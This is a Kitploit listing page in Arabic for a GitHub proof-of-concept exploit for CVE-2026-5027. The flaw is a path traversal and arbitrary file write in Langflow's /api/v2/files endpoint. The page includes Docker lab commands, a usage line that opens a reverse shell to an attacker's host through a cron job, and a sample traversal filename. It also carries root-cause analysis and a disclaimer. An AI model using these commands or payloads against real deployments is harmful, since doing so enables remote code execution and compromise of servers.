Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5027 — إثبات مفهوم للاستغلال لـ CVE-2026-5027، وهو اجتياز مسار وكتابة ملف عشوائي في نقطة نهاية /api/v2/files في Langflow، مع مختبر Docker وخيار reverse shell. | Kitploit
أدوات/GitHubGitHub/yym8538/cve-2026-5027
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأداة الوصول عن بعد
GitHubyym8538/cve-2026-5027

CVE-2026-5027

إثبات مفهوم للاستغلال لـ CVE-2026-5027، وهو اجتياز مسار وكتابة ملف عشوائي في نقطة نهاية /api/v2/files في Langflow، مع مختبر Docker وخيار reverse shell.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هذا المنشور عبارة عن مقال بحثي نُشر بواسطة EQSTLab.

شكرًا لـ Yahia Hamza، الذي أبلغ عن هذه الثغرة الأمنية وقام بتحليلها.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


الوصف

CVE-2026-5027 : ثغرة الكتابة التعسفية للملفات في Langflow

الوصف: تسمح ثغرة اجتياز المسار (Path Traversal) في Langflow <= 1.8.4 للمهاجمين بكتابة ملفات تعسفية خارج دليل الرفع المقصود عبر قيمة filename مُصمَّمة متعددة الأجزاء (multipart) يتم تمريرها إلى نقطة النهاية /api/v2/files. في عمليات النشر التي يكون فيها تسجيل الدخول التلقائي مُفعَّلاً أو تكون المصادقة ضعيفة التطبيق بأي شكل آخر، قد يُستغل هذا الأمر لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر كتابة محتوى يتحكم فيه المهاجم إلى مواقع حساسة في نظام الملفات.


إعداد المختبر

قم ببناء وتشغيل البيئة المعرَّضة للثغرة باستخدام Docker:

بناء الصورة

root@kitploit:~
docker build -t cve-2026-5027 .

تشغيل الحاوية

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

كيفية الاستخدام

التنفيذ

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

التحليل

نقطة النهاية المعرَّضة للثغرة

root@kitploit:~
POST /api/v2/files

توجد المشكلة لأن وظيفة الرفع تثق بقيمة filename متعددة الأجزاء التي يوفرها العميل. فبدلاً من إنشاء اسم تخزين آمن من جانب الخادم أو تقييد المسار المُحلَّل إلى دليل رفع مخصص، يسمح مسار التعليمات البرمجية المعرَّض للثغرة بتسلسلات اجتياز المسار مثل ../ للتأثير على مسار الوجهة النهائي.

ونتيجة لذلك، يمكن للمهاجم الخروج من جذر التخزين المقصود وإجبار التطبيق على كتابة ملفات إلى مواقع تعسفية على نظام ملفات الخادم.

فيما يلي تدفق استغلال نموذجي:

  1. الحصول على رمز وصول (access token) عبر تسجيل الدخول العادي أو عملية نشر يكون فيها تسجيل الدخول التلقائي مُفعَّلاً.
  2. إرسال طلب رفع متعدد الأجزاء إلى /api/v2/files.
  3. تمرير قيمة filename مُصمَّمة تحتوي على تسلسلات اجتياز المسار.
  4. التسبب في قيام Langflow بكتابة محتوى يتحكم فيه المهاجم خارج دليل التخزين المتوقع.

هذه في جوهرها مشكلة CWE-22: التقييد غير السليم لاسم المسار إلى دليل مقيَّد.

السبب الجذري التقني

ينتج الخلل الأمني عن التطهير والتحقق غير الكافيين لمسارات الملفات التي يتحكم فيها المستخدم أثناء معالجة الرفع. يقبل التطبيق اسم الملف الأصلي من العميل ويمرره إلى سير عمل التخزين دون فرض التطبيع والاحتواء المناسبين للمسار.

من وجهة نظر دفاعية، فإن النمط الخطير يشبه من حيث المفهوم ما يلي:

root@kitploit:~
save_path = base_dir / file.filename

إذا كانت file.filename تحتوي على مكونات اجتياز المسار مثل:

root@kitploit:~
../../../../tmp/poc.txt

فقد يشير المسار المُحلَّل النهائي إلى خارج base_dir، مما يتيح الكتابة التعسفية للملفات.

لماذا هذا مهم

غالبًا ما تكون ثغرات الكتابة التعسفية للملفات أكثر خطورة من مشكلات الرفع غير المقيَّد القياسية لأن المهاجم يتحكم ليس فقط في محتويات الملف، بل أيضًا في مسار الوجهة. واعتمادًا على امتيازات وقت التشغيل لعملية Langflow، قد يتيح ذلك:

  • الكتابة فوق ملفات التطبيق
  • تعديل ملفات بدء التشغيل أو المهام المجدولة
  • الاستمرارية عبر تهيئة الصدفة (shell) أو ملفات المفاتيح
  • التصعيد من الكتابة التعسفية للملفات إلى تنفيذ التعليمات البرمجية عن بُعد

السيناريو

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

إخلاء المسؤولية

لا يهدف هذا المستودع إلى تسهيل الاستغلال غير المصرَّح به لنسخ Langflow. الغرض من هذا المشروع هو مساعدة الباحثين الأمنيين والمدافعين والمطورين على فهم الثغرة الأمنية، والتحقق من مدى التعرُّض في بيئات مُتحكَّم بها، وتطبيق تدابير التخفيف الفعّالة.


المراجع

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

تنزيل الأداة